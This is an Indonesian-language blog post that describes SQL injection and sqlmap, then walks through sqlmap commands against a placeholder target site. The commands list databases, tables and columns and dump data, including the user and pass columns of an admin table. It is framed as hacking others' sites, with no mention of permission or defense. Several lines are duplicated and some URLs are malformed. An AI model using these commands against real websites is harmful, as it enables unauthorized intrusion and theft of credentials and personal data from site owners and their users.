Selamat malem sobat ketemu lagi dengan Admin Kali ini Admin mau nulis artikel menjalankan perintah sqlmap di Android / PC
Apa Yang di maksud SQL Injection?
SQL Injection adalah teknik injeksi code yang digunakan untuk melakukan serangan pada aplikasi web berbasis data di mana pernyataan malicious SQL dimasukkan ke dalam entri untuk di eksekusi (misalnya untuk menampilkan konten database ke penyerang). SQL injection dapat mengeksploitasi kerentanan keamanan pada perangkat lunak aplikasi, misalnya saat user salah melakukan filter inputan untuk pengiriman karakter yang disematkan dalam pernyataan SQL atau inputan user tidak diketik dengan benar dan tanpa diduga dieksekusi. SQL Injection lebih dikenal sebagai vektor serangan untuk sebuah situs web namun juga dapat digunakan untuk menyerang semua jenis database SQL
Apa Yang maksud dengan SQLMap?
SQLMap adalah salah satu tool otomatis untuk melakukan SQL Injection yang paling populer dan hebat. Dengan url http request yang rentan, sqlmap dapat mengeksploitasi remote database dan melakukan hacking seperti mengekstrak nama database, tabel, kolom, semua data dalam tabel, dll. Bahkan dapat membaca dan menulis file pada remote sistem file pada kondisi tertentu. Ditulis dalam bahasa python dan merupakan salah satu alat hacking yang paling hebat. SQLMap adalah SQL Injection metasploit.
Ok langsung saja tanpa banyak basa basi lagi..
Saya anggap kalian sudah menginstall sqlmap nya ya.. Jika sudah buka Terminal cmd nya
- Ketik cd sqlmap / Enter
- Ketik python sqlmap.py -u http:/webtarget.com/index.php?id=24 --dbs / Enter
- Ketik python sqlmap.py -u http:/webtarget.com/index.php?id=24 -D Database webtarget lu --tables / Enter
- Ketik python sqlmap.py -u http:/webtarget.com/index.php?id=24 -D Database webtarget lu -T tables webtarget lu --columns / Enter
- Ketik python sqlmap.py -u http:/webtarget.com/index.php?id=24 -D Database webtarget lu -T tables webtarget lu -C columns web target lu --dump / Enter
Nah intinya udh bisa jalankan
Sekarang tinggal berkreasi sendiri saja
Dan pasti sudah pada ngerti command" sqlmap nya :)
Sekarang tinggal berkreasi sendiri saja
Dan pasti sudah pada ngerti command" sqlmap nya :)
Beberapa fungsi command sqlmap standar komunitas
-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 --dbs
> "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap
> "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.
> "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap
> "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.
-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 -D database --tables
> "-D" adalah database
> "--tables" adalah untuk mendapatkan tables dari database
> "-D" adalah database
> "--tables" adalah untuk mendapatkan tables dari database
-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 -D database -T admin --columns
> "-T" adalah nama table
> "--columns" adalah melihat columns di table
> "-T" adalah nama table
> "--columns" adalah melihat columns di table
-Misal: python sqlmap.py -u http://webvulnnya.com/index.php?id=0 -D database -T admin -C user,pass --dump
> "-C " adalah nama column
> "--dump" adalah melihat data di column
> "-C " adalah nama column
> "--dump" adalah melihat data di column
Itulah command standar komunitasnya :v
Untuk command lainnya kepribadian privasi masing" :p
Untuk command lainnya kepribadian privasi masing" :p
Baca bismillah sebelum ngedump :v
Ok sekian dan terima kasih
Adalah seorang yang senang mempelajari hal-hal baru seputar dunia Teknologi, Internet dan Bisnis Online.